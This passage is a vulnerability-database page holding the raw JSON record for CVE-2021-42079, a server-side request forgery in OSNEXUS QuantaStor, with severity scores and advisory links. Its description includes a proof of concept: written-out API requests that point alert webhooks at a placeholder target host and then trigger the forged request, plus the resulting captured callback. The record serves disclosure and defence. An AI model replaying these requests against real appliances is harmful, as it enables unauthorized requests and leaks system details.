test\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"text\\\": \\\"test\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"fields\\\": [ \u00a0 \\n\u2003\u2003\u2003\u2003\u2003{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \u00a0 \u00a0\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \u00a0 \u00a0\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": false \u00a0\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"Appliance\\\", \u00a0 \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"quantastor (https://\u003cHOSTNAME\u003e)\\\",\\n  \u00a0 \u00a0 \\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": false \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003}, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"System Startup\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"Fri Aug \u00a06 16-02-55 2021\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003     }, \u00a0{ \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"title\\\": \\\"SSID\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \u00a0 \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003\u2003\\\"short\\\": true \u00a0\\n\\n\u2003\u2003\u2003\u2003\u2003},\\n\u2003\u2003\u2003\u2003],\\n\\n\u2003\u2003\u2003\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\\n\u2003\u2003\u2003\u2003\\\"footer_icon\\\": \\\" https://platform.slack-edge.com/img/default_application_icon.png \\\",\\n\\n\u2003\u2003\u2003\u2003\\\"ts\\\": 1628461774\\n\u2003\u2003\u2003}\\n\u2003\u2003], \\n\u2003\u2003\\\"mrkdwn\\\":true \\n\u2003}\u0027, \\n\u2003#### FLASK REQUEST STUFF #####\\n\\n\u2003\u0027headers\u0027: {\\n\\n\u2003\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \\n\u2003\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \\n\u2003\u2003\u0027Accept\u0027: \u0027*/*\u0027, \\n\u2003\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \\n\u2003\u2003\u0027Content-Length\u0027: \u0027790\u0027\\n\\n\u2003}, \\n\u2003\u0027args\u0027: ImmutableMultiDict([]), \\n\u2003\u0027form\u0027: ImmutableMultiDict([]), \\n\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \\n\u2003\u0027path\u0027: \u0027/payload/58\u0027, \\n\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\\n}\\n\\n#### END FLASK REQUEST STUFF #####\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N\",\"baseScore\":6.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.7,\"impactScore\":4.0},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":4.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.2,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"csirt@divd.nl\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"6.0.0.355\",\"matchCriteriaId\":\"5E101217-36C7-4C28-8C61-7744481D2D0E\"}]}]}],\"references\":[{\"url\":\"https://cisrt.divd.nl/DIVD-2021-00020/\",\"source\":\"csirt@divd.nl\"},{\"url\":\"https://csirt.divd.nl/CVE-2021-42079\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"csirt@divd.nl\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://csirt.divd.nl/CVE-2021-42079\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https://www.divd.nl/DIVD-2021-00020\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.osnexus.com/products/software-defined-storage\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Product\"]},{\"url\":\"https://www.wbsec.nl/osnexus\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.divd.nl/DIVD-2021-00020\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\", \"x_transferred\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T03:22:25.855Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2021-42079\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-04T20:06:08.530050Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-04T20:06:13.510Z\"}}], \"cna\": {\"title\": \"SSRF vulnerability in OSNEXUS QuantaStor before 6.0.0.355\", \"source\": {\"discovery\": \"INTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Wietse Boonstra (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Frank Breedijk (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Pasman (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Victor Gevers (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"Max van der Horst (DIVD)\"}, {\"lang\": \"en\", \"type\": \"analyst\", \"value\": \"C\\u00e9listine Oosting (DIVD)\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"OSNEXUS\", \"product\": \"QuantaStor\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"6.0.0.355\", \"versionType\": \"semver\"}], \"platforms\": [\"Windows\", \"Linux\"], \"collectionURL\": \"https://www.osnexus.com/downloads\", \"defaultStatus\": \"unknown\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Upgrade to the latest version of OSNEXUS QuantaStor.\", \"base64\": false}]}], \"references\": [{\"url\": \"https://www.wbsec.nl/osnexus\", \"tags\": [\"third-party-advisory\", \"technical-description\"]}, {\"url\": \"https://cisrt.divd.nl/DIVD-2021-00020/\", \"tags\": [\"third-party-advisory\", \"exploit\", \"technical-description\"]}, {\"url\": \"https://www.osnexus.com/products/software-defined-storage\", \"tags\": [\"product\"]}, {\"url\": \"https://csirt.divd.nl/CVE-2021-42079\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\\n\\nPOC\\n\\nStep 1: Prepare the SSRF with a request like this:\\n\\nGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026smtpServerIpAddress=BURPCOLLABHOST\u0026smtpServerPort=25\u0026smtpUsername=a\u0026smtpPassword=1\u0026smtpAuthType=1\u0026customerSupportEmailAddress=1\u0026poolFreeSpaceWarningThreshold=1\u0026poolFreeSpaceAlertThreshold=1\u0026poolFreeSpaceCriticalAlertThreshold=1\u0026pagerDutyServiceKey=1\u0026slackWebhookUrl=http://\u003ctarget\u003e\u0026enableAlertTypes\u0026enableAlertTypes=1\u0026disableAlertTypes=1\u0026pauseAlertTypes=1\u0026mattermostWebhookUrl=http://\u003cTARGET\u003e\\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 0\\n\\nStep 2: Trigger this alert with this request\\n\\nGET /qstorapi/alertRaise?title=test\u0026message=test\u0026severity=1 \\nHTTP/1.1\\n\\nHost: \u003cHOSTNAME\u003e \\nAccept-Encoding: gzip, deflate\\n\\nAccept: */*\\n\\nAccept-Language: en\\n\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\\nConnection: close\\n\\nauthorization: Basic \u003cBASIC_AUTH_HASH\u003e \\nContent-Type: application/json\\n\\nContent-Length: 1\\n\\nThe post request received by \u003cTARGET\u003e looks like this:\\n{\\n\\u2003\\n### Python FLASK stuff ####\\n\\n\\u2003\u0027endpoint\u0027: \u0027index\u0027, \\n\\u2003\\n\u0027method\u0027: \u0027POST\u0027, \\n\\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \\n\\u2003\\n### END Python FLASK stuff ####\\n\\n\\u2003\\n\u0027data\u0027: b\u0027{ \\n\\u2003\\u2003\\\"attachments\\\": [ \\n\\u2003\\u2003\\u2003{\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"[122] test\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"text\\\": \\\"test\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"fields\\\": [ \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \\u00a0 \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \\u00a0 \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \\u00a0\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Appliance\\\", \\u00a0 \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"quantastor (https://\u003cHOSTNAME\u003e)\\\",\\n  \\u00a0 \\u00a0 \\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003}, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System Startup\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"Fri Aug \\u00a06 16-02-55 2021\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003     }, \\u00a0{ \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"SSID\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \\u00a0 \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \\u00a0\\n\\n\\u2003\\u2003\\u2003\\u2003\\u2003},\\n\\u2003\\u2003\\u2003\\u2003],\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"footer_icon\\\": \\\" https://platform.slack-edge.com/img/default_application_icon.png \\\",\\n\\n\\u2003\\u2003\\u2003\\u2003\\\"ts\\\": 1628461774\\n\\u2003\\u2003\\u2003}\\n\\u2003\\u2003], \\n\\u2003\\u2003\\\"mrkdwn\\\":true \\n\\u2003}\u0027, \\n\\u2003#### FLASK REQUEST STUFF #####\\n\\n\\u2003\u0027headers\u0027: {\\n\\n\\u2003\\u2003\u0027Host\u0027: \u0027\u003credacted\u003e\u0027, \\n\\u2003\\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \\n\\u2003\\u2003\u0027Accept\u0027: \u0027*/*\u0027, \\n\\u2003\\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \\n\\u2003\\u2003\u0027Content-Length\u0027: \u0027790\u0027\\n\\n\\u2003}, \\n\\u2003\u0027args\u0027: ImmutableMultiDict([]), \\n\\u2003\u0027form\u0027: ImmutableMultiDict([]), \\n\\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \\n\\u2003\u0027path\u0027: \u0027/payload/58\u0027, \\n\\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\\n}\\n\\n#### END FLASK REQUEST STUFF #####\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests.\u003cbr\u003e\u003cbr\u003ePOC\u003cbr\u003e\u003cbr\u003eStep 1: Prepare the SSRF with a request like this:\u003cbr\u003e\u003cbr\u003e\u003ctt\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eGET /qstorapi/alertConfigSet?senderEmailAddress=a\u0026amp;smtpServerIpAddress=BURPCOLLABHOST\u0026amp;smtpServerPort=25\u0026amp;smtpUsername=a\u0026amp;smtpPassword=1\u0026amp;smtpAuthType=1\u0026amp;customerSupportEmailAddress=1\u0026amp;poolFreeSpaceWarningThreshold=1\u0026amp;poolFreeSpaceAlertThreshold=1\u0026amp;poolFreeSpaceCriticalAlertThreshold=1\u0026amp;pagerDutyServiceKey=1\u0026amp;slackWebhookUrl=\u003c/span\u003ehttp://\u0026lt;target\u0026gt;\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e\u0026amp;enableAlertTypes\u0026amp;enableAlertTypes=1\u0026amp;disableAlertTypes=1\u0026amp;pauseAlertTypes=1\u0026amp;mattermostWebhookUrl=\u003c/span\u003ehttp://\u0026lt;TARGET\u0026gt;\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eHTTP/1.1\\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\\n\u003cbr\u003eAccept: */*\\nAccept-Language: en\\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\u003cbr\u003e\\nConnection: close\\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\\n\u003cbr\u003eContent-Length: 0\u003c/span\u003e\u003c/tt\u003e\u003cbr\u003e\u003ctt\u003e\u003cbr\u003eStep 2: Trigger this alert with this request\u003cbr\u003e\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003eGET /qstorapi/alertRaise?title=test\u0026amp;message=test\u0026amp;severity=1 \u003cbr\u003eHTTP/1.1\\n\u003cbr\u003eHost: \u0026lt;HOSTNAME\u0026gt; \u003cbr\u003eAccept-Encoding: gzip, deflate\\n\u003cbr\u003eAccept: */*\\n\u003cbr\u003eAccept-Language: en\\n\u003cbr\u003eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\n\u003cbr\u003eConnection: close\\n\u003cbr\u003eauthorization: Basic \u0026lt;BASIC_AUTH_HASH\u0026gt; \u003cbr\u003eContent-Type: application/json\\n\u003cbr\u003eContent-Length: 1\u003cbr\u003e\u003cbr\u003e\u003c/span\u003e\u003c/tt\u003eThe post request received by \u0026lt;TARGET\u0026gt; looks like this:\u003cbr\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e{\u003cbr\u003e\\u2003\\n### Python FLASK stuff ####\\n\u003cbr\u003e\\u2003\u0027endpoint\u0027: \u0027index\u0027, \u003cbr\u003e\\u2003\\n\u0027method\u0027: \u0027POST\u0027, \u003cbr\u003e\\u2003\\n\u0027cookies\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\\n### END Python FLASK stuff ####\\n\u003cbr\u003e\\u2003\\n\u0027data\u0027: b\u0027{ \u003cbr\u003e\\u2003\\u2003\\\"attachments\\\": [ \u003cbr\u003e\\u2003\\u2003\\u2003{\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"fallback\\\": \\\"[122] test / test.\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"color\\\": \\\"#aa2222\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"[122] test\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"text\\\": \\\"test\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"fields\\\": [ \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Alert Severity\\\",\\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"CRITICAL\\\",\\n     \u0026nbsp; \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \u0026nbsp;\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"Appliance\\\", \u0026nbsp; \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"quantastor (\u003c/span\u003ehttps://\u0026lt;HOSTNAME\u0026gt;\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e)\\\",\\n  \u0026nbsp; \u0026nbsp; \u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System / Driver / Kernel Ver\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": false \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003}, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"System Startup\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"Fri Aug \u0026nbsp;6 16-02-55 2021\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003     }, \u0026nbsp;{ \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"title\\\": \\\"SSID\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"value\\\": \\\"f4823762-1dd1-1333-47a0-6238c474a7e7\\\", \u0026nbsp; \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003\\u2003\\\"short\\\": true \u0026nbsp;\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\u2003},\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003],\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"footer\\\": \\\"QuantaStor Call-home Alert\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"footer_icon\\\": \\\"\u003c/span\u003e\u003ca target=\\\"_blank\\\" rel=\\\"nofollow\\\" href=\\\"https://platform.slack-edge.com/img/default_application_icon.png\\\"\u003ehttps://platform.slack-edge.com/img/default_application_icon.png\u003c/a\u003e\u003cspan style=\\\"background-color: rgba(29, 28, 29, 0.04);\\\"\u003e\\\",\\n\u003cbr\u003e\\u2003\\u2003\\u2003\\u2003\\\"ts\\\": 1628461774\u003cbr\u003e\\u2003\\u2003\\u2003}\u003cbr\u003e\\u2003\\u2003], \u003cbr\u003e\\u2003\\u2003\\\"mrkdwn\\\":true \u003cbr\u003e\\u2003}\u0027, \u003cbr\u003e\\u2003#### FLASK REQUEST STUFF #####\\n\u003cbr\u003e\\u2003\u0027headers\u0027: {\\n\u003cbr\u003e\\u2003\\u2003\u0027Host\u0027: \u0027\u0026lt;redacted\u0026gt;\u0027, \u003cbr\u003e\\u2003\\u2003\u0027User-Agent\u0027: \u0027curl/7.58.0\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Accept\u0027: \u0027*/*\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Content-Type\u0027: \u0027application/json\u0027, \u003cbr\u003e\\u2003\\u2003\u0027Content-Length\u0027: \u0027790\u0027\\n\u003cbr\u003e\\u2003}, \u003cbr\u003e\\u2003\u0027args\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\u0027form\u0027: ImmutableMultiDict([]), \u003cbr\u003e\\u2003\u0027remote_addr\u0027: \u0027217.103.63.173\u0027, \u003cbr\u003e\\u2003\u0027path\u0027: \u0027/payload/58\u0027, \u003cbr\u003e\\u2003\u0027whois_ip\u0027: \u0027TNF-AS, NL\u0027\u003cbr\u003e}\\n\u003cbr\u003e#### END FLASK REQUEST STUFF #####\u003c/span\u003e\u003ctt\u003e\u003c/tt\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918 Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"shortName\": \"DIVD\", \"dateUpdated\": \"2025-09-22T06:40:03.059Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2021-42079\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-09-22T06:40:03.059Z\", \"dateReserved\": \"2021-10-07T17:12:57.677Z\", \"assignerOrgId\": \"b87402ff-ae37-4194-9dae-31abdbd6f217\", \"datePublished\": \"2023-07-10T06:29:48.339Z\", \"assignerShortName\": \"DIVD\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.